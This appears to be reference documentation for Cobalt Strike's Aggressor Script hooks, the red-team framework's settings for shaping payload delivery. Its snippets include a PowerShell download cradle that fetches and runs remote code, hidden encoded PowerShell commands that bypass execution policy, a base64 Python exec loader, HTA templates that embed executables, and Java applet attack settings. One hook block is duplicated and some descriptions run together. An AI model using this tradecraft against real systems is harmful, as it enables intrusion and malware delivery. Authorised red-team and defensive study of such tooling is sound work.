Hooks allow Aggressor Script to intercept and change Cobalt Strike behavior.
Format shellcode before it's placed on the HTML page generated to serve the Signed or Smart Applet Attacks.
https://www.cobaltstrike.com/help-java-signed-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set APPLET_SHELLCODE_FORMAT {
return base64_encode($1);
}
Control the EXE and DLL generation for Cobalt Strike.
$1 - the artifact file (e.g., artifact32.exe)$2 - shellcode to embed into an EXE or DLLThis hook is demonstrated in the Artifact Kit:
https://www.cobaltstrike.com/help-artifact-kit
Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.
$1 - the EXE data$2 - the name of the .exeThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set HTMLAPP_EXE {
local('$handle $data');
$handle = openf(script_resource("template.exe.hta"));
$data = readb($handle, -1);
closef($handle);
$data = strrep($data, '##EXE##', transform($1, "hex"));
$data = strrep($data, '##NAME##', $2);
return $data;
}
Controls the content of the HTML Application User-driven (PowerShell Output) generated by Cobalt Strike.
$1 - the PowerShell command to runThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set HTMLAPP_POWERSHELL {
local('$handle $data');
$handle = openf(script_resource("template.psh.hta"));
$data = readb($handle, -1);
closef($handle);
# push our command into the script
return strrep($data, "%%DATA%%", $1);
}
Change the form of the powershell comamnd run by Cobalt Strike's automation. This affects jump psexec_psh, powershell, and [host] -> Access -> One-liner.
$1 - the PowerShell command to run.$2 - true|false the command is run on a remote target.This hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set POWERSHELL_COMMAND {
local('$script');
$script = transform($1, "powershell-base64");
# remote command (e.g., jump psexec_psh)
if ($2) {
return "powershell -nop -w hidden -encodedcommand $script";
}
# local command
else {
return "powershell -nop -exec bypass -EncodedCommand $script";
}
}
A hook used by the resource kit to compress a PowerShell script. The default uses gzip and returns a deflator script.
This hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
$1 - the script to compressChange the form of the PowerShell download cradle used in Cobalt Strike's post-ex automation. This includes jump winrm|winrm64, [host] -> Access -> One Liner, and powershell-import.
$1 - the URL of the (localhost) resource to reachThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set POWERSHELL_DOWNLOAD_CRADLE {
return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
}
Set the service name used by jump psexec|psexec64|psexec_psh and psexec.
set PSEXEC_SERVICE {
return "foobar";
}
Compress a Python script generated by Cobalt Strike.
$1 - the script to compressThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set PYTHON_COMPRESS {
return "import base64; exec base64.b64decode(\"" . base64_encode($1) . "\")";
}
Control the format of the VBS template used in Cobalt Strike.
This hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
$1 - the shellcode to inject and runControls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.
$1 - the EXE data$2 - the name of the .exeThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set HTMLAPP_EXE {
local('$handle $data');
$handle = openf(script_resource("template.exe.hta"));
$data = readb($handle, -1);
closef($handle);
$data = strrep($data, '##EXE##', transform($1, "hex"));
$data = strrep($data, '##NAME##', $2);
return $data;
}
Specify the MAIN class of the Java Signed Applet Attack.
https://www.cobaltstrike.com/help-java-signed-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SIGNED_APPLET_MAINCLASS {
return "Java.class";
}
Specify a Java Applet file to use for the Java Signed Applet Attack.
https://www.cobaltstrike.com/help-java-signed-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SIGNED_APPLET_RESOURCE {
return script_resource("dist/applet_signed.jar");
}
Specify the MAIN class of the Java Smart Applet Attack.
https://www.cobaltstrike.com/help-java-smart-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SMART_APPLET_MAINCLASS {
return "Java.class";
}
Specify a Java Applet file to use for the Java Smart Applet Attack
https://www.cobaltstrike.com/help-java-smart-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SMART_APPLET_RESOURCE {
return script_resource("dist/applet_rhino.jar");
}